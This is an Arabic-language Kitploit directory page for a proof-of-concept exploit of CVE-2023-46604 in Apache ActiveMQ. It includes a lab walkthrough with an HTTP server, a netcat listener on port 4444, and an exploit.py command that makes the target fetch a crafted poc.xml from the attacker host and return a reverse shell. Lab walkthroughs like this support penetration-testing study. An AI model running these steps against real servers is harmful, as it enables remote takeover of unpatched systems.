Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-46604 — استغلال PoC لـ CVE-2023-46604 يستهدف Apache ActiveMQ، يقدم شل عكسي عبر حمولة XML مُصممة عبر HTTP. | Kitploit
أدوات/GitHubGitHub/cuanh2333/cve-2023-46604
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubcuanh2333/cve-2023-46604

CVE-2023-46604

استغلال PoC لـ CVE-2023-46604 يستهدف Apache ActiveMQ، يقدم شل عكسي عبر حمولة XML مُصممة عبر HTTP.

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-46604

image

قم بإعداد docker-compose يحتوي على صورتين وهما جهاز الضحية والجهاز الهدف وفقًا للبيئة المطلوبة على جهاز الضحية، قم بتشغيل ActiveMQ

انتقل إلى جهاز المهاجم: • قم بتشغيل خدمة HTTP لإرسال poc: python3 -m http.server

• استخدم netcat للاستماع إلى الاتصال القادم إلى جهاز المهاجم nc -nlvp 4444

• أرسل الحمولة (payload) لإنشاء اتصال reverse shell إلى جهاز المهاجم python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml حيث:

  • Exploit.py: ملف الكود الخاص باستغلال الثغرة
  • -I 172.18.0.3: عنوان IP الخاص بالجهاز الذي يرسل الحمولة (payload)
  • -p 61616: المنفذ الذي يستمع عليه ActiveMQ الخاص بجهاز الضحية
  • --xml http://172.18.0.2:8000/poc.xml: عنوان URL لملف poc.xml على جهاز المهاجم

يمكن ملاحظة أنه بعد تنفيذ أمر تشغيل ملف ‘exploit.py’، يرسل كود الاستغلال حزمة ‘poc.xml’ من خادم الويب إلى الهدف، وهو عنوان خدمة ActiveMQ التي تعمل على الخادم الهدف. وفي الوقت نفسه، يستقبل خادم HTTP على جهاز المهاجم request المرسل من عنوان IP الخاص بالجهاز الهدف.

بعد إرسال الحمولة، انتقل إلى الطرفية (terminal) التي تستمع على المنفذ 4444 في جهاز المهاجم. سنجد أن reverse shell الخاص بجهاز الضحية قد تم إرساله إلينا.

تنزيل الأداة